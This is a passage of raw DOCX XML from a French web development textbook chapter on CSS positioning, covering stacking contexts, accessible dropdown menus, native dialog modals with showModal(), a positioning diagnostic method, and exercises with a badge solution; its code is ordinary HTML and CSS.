        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>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Ajouter </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>position</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Menu sous un bloc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Ancêtre transformé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Sortir le menu du contexte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modale derrière le voile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contextes différents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Regrouper dans un même contexte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Ordre imprévisible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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z-index</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> arbitraires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Échelle documentée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>20.4 Menus déroulants accessibles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un menu doit s'ouvrir au clic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>et</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> au clavier, se fermer avec Échap, piéger le focus tant qu'il est ouvert, et rendre le focus au déclencheur à la fermeture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une structure de menu annonçable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&lt;div class="menu"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;button class="menu__declencheur" aria-expanded="false"</w:t>
        <w:br/>
        <w:t xml:space="preserve">          aria-controls="menu-liste" id="menu-bouton"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Menu</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;ul class="menu__liste" id="menu-liste" hidden&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="/cours"&gt;Cours&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="/blog"&gt;Blog&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/ul&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un menu positionné sous son déclencheur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.menu { position: relative; display: inline-block; }</w:t>
        <w:br/>
        <w:t>.menu__liste {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: absolute;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  inset-block-start: calc(100% + .4rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  inset-inline-start: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  min-width: 12rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: #fff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 1px solid #d5dee6;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 8px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  box-shadow: 0 12px 28px rgb(15 46 76 / 14%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: .35rem 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  list-style: none;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  z-index: 20;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.menu__liste[hidden] { display: none; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suffit à masquer le menu, mais il faut le basculer en JavaScript et mettre à jour </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-expanded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Le chapitre 27 détaille le comportement complet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>20.5 Fenêtre modale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une modale est une boîte de dialogue qui interrompt le reste de la page. Elle doit bloquer l'interaction avec l'arrière-plan et rendre le focus à l'élément déclencheur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>L'élément `dialog` natif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&lt;dialog id="confirmation" aria-labelledby="titre-confirmation"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h2 id="titre-confirmation"&gt;Supprimer cet article ?&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;Cette action est définitive.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;form method="dialog"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;button value="annuler"&gt;Annuler&lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;button value="supprimer" class="bouton--danger"&gt;Supprimer&lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/form&gt;</w:t>
        <w:br/>
        <w:t>&lt;/dialog&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une modale native, stylée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.dialog { border: 0; border-radius: 12px; padding: 1.5rem; max-width: 32rem; }</w:t>
        <w:br/>
        <w:t>dialog::backdrop { background: rgb(15 46 76 / 55%); }</w:t>
        <w:br/>
        <w:t>dialog[open] { animation: apparition 180ms ease-out; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;dialog&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> offre gratuitement le piège de focus, la fermeture par Échap et le fond </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>::backdrop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. C'est un progrès considérable par rapport aux modales bricolées en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, qui oublient presque toujours l'accessibilité.</w:t>
      </w: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`SHOWMODAL()` PLUTÔT QUE `SHOW()`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dialog.show()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> affiche la boîte sans bloquer l'arrière-plan. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dialog.showModal()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ajoute le piège de focus, le fond inerte et la fermeture par Échap : c'est la méthode à utiliser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>20.6 Diagnostiquer un positionnement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un élément positionné se comporte mal pour trois raisons : l'ancêtre de référence n'est pas celui attendu, une propriété d'insertion manque, ou un contexte d'empilement l'enferme.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux insertions valent mieux qu'un décalage approximatif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Toujours définir au moins deux insertions pour maîtriser la position */</w:t>
        <w:br/>
        <w:t>.outil {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: fixed;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  inset-block-end: 1.5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  inset-inline-end: 1.5rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Vérifier l'ancêtre réel : l'inspecteur affiche la chaîne de positionnement</w:t>
        <w:br/>
        <w:t xml:space="preserve">  */</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MÉTHODE DE DIAGNOSTIC EN QUATRE ÉTAPES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Quel est l'ancêtre positionné le plus proche ? (inspecteur)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L'élément est-il dans un contexte d'empilement ? (transform, opacity)</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Quelles insertions sont définies ? (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>top</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>left</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>inset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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L'ordre du DOM permet-il l'accessibilité au clavier ?</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relative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> garde sa place, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>absolute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sort du flux.</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Un élément </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>absolute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se réfère à son ancêtre positionné le plus proche.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sticky</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exige un seuil et un conteneur de défilement adapté.</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z-index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne s'applique qu'aux éléments positionnés ou flex/grid.</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transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> créent des contextes d'empilement.</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&lt;dialog&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>showModal()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> offrent l'accessibilité native.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Une échelle de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> documentée évite les conflits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le positionnement est maîtrisé. Le chapitre suivant assemble tout cela dans une démarche responsive complète.</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20.1 — Badge sur une carte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Placez un badge « Nouveau » en haut à droite d'une carte, sans décaler le contenu.</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 xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>position: relative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur la carte.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 xml:space="preserve">Positionnez le badge avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>inset</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qu'il reste lisible sur mobile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 20.2 — En-tête de tableau collant</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 tableau de 80 lignes doit garder ses en-têtes visibles au défilement.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 xml:space="preserve">Appliquez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>position: sticky</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>th</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Ajoutez un fond opaque.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 xml:space="preserve">Gérez l'empilement avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 20.3 — Corriger une modale inaccessible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ACCESSIBILITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une modale est construite avec des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, le fond reste cliquable et le focus s'échappe.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 xml:space="preserve">Remplacez la structure par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dialog</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 xml:space="preserve">Ajoutez un titre relié par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-labelledby</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Rendez le focus au déclencheur.</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20.1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.carte { position: relative; padding: 1.25rem; }</w:t>
        <w:br/>
        <w:t>.badge {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: absolute;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  inset-block-start: .75rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  inset-inline-end: .75rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: #1f2933;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-size: .75rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-weight: 700;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: .2rem .55rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 999px;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le badge est retiré du flux : il ne pousse ni le titre ni le texte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
